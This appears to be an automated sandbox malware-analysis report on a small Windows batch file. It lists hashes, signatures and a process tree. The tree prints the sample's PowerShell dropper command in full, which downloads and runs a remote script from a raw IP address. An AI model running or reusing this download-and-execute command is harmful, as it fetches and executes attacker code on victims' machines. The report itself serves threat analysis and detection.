Analysis
-
max time kernel
128s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
11-06-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
25beb425e3126143f961ead9e6eda285.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
25beb425e3126143f961ead9e6eda285.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
25beb425e3126143f961ead9e6eda285.bat
-
Size
220B
-
MD5
f519bf505e47286d4237924b8d9b7aac
-
SHA1
503b29182aa3c2b01f3ac4a4846eae307e1c22bc
-
SHA256
a22cfd42ad2a8cec8a49dc236b16ed7579c0ece0e048546b759a9fc620b79987
-
SHA512
28300f35bc17da4eb060ee5cac3258c1dd57b4f287bdd63c107bd3f5c25246d6a34bba484ee8c4cdaf615c7ef4498fc02665c0268f59b92b05d74fbfeb936c8c
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1764 1324 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1764 WerFault.exe Token: SeBackupPrivilege 1764 WerFault.exe Token: SeDebugPrivilege 1764 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\25beb425e3126143f961ead9e6eda285.bat"1⤵PID:3264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25beb425e3126143f961ead9e6eda285');Invoke-YOGGLCMTVFBXE;Start-Sleep -s 10000"2⤵PID:1324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1764